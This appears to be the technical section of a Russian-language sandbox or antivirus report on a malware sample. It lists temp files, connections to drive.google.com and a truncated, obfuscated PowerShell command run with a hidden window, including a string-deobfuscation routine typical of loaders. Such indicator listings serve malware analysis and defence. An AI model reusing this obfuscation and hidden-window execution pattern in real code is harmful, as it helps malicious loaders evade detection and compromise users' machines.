Техническая информация
- %WINDIR%\temp\cab148a.tmp
- %WINDIR%\temp\tar148b.tmp
- %WINDIR%\temp\cab2aab.tmp
- %WINDIR%\temp\tar2aac.tmp
- %WINDIR%\temp\cab148a.tmp
- %WINDIR%\temp\tar148b.tmp
- %WINDIR%\temp\cab2aab.tmp
- %WINDIR%\temp\tar2aac.tmp
- 'drive.google.com':443
- 'pk#.goog':80
- http://pk#.goog/gsr1/gsr1.crt
- 'drive.google.com':443
- DNS ASK drive.google.com
- DNS ASK pk#.goog
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' "Function Brush9 ([String]$Sevenf){For($Geneal=5; $Geneal -lt $Sevenf.Length-$Autotr; $Geneal+=6){$Tllerkor=$Sevenf.Substring($Geneal, $Autotr);$Daisy=$Daisy+$Tllerkor}$Daisy;}$Merin = 'echo 1 ...' (со скрытым окном)
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' "Function Brush9 ([String]$Sevenf){For($Geneal=5; $Geneal -lt $Sevenf.Length-$Autotr; $Geneal+=6){$Tllerkor=$Sevenf.Substring($Geneal, $Autotr);$Daisy=$Daisy+$Tllerkor}$Daisy;}$Merin = 'echo 1 ...
- '<SYSTEM32>\cmd.exe' /c "echo 1 && exit"
- '%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' "Function Brush9 ([String]$Sevenf){For($Geneal=5; $Geneal -lt $Sevenf.Length-$Autotr; $Geneal+=6){$Tllerkor=$Sevenf.Substring($Geneal, $Autotr);$Daisy=$Daisy+$Tllerkor}$Daisy;}$Merin = 'echo 1 ...
- '%WINDIR%\syswow64\cmd.exe' /c "echo 1 && exit"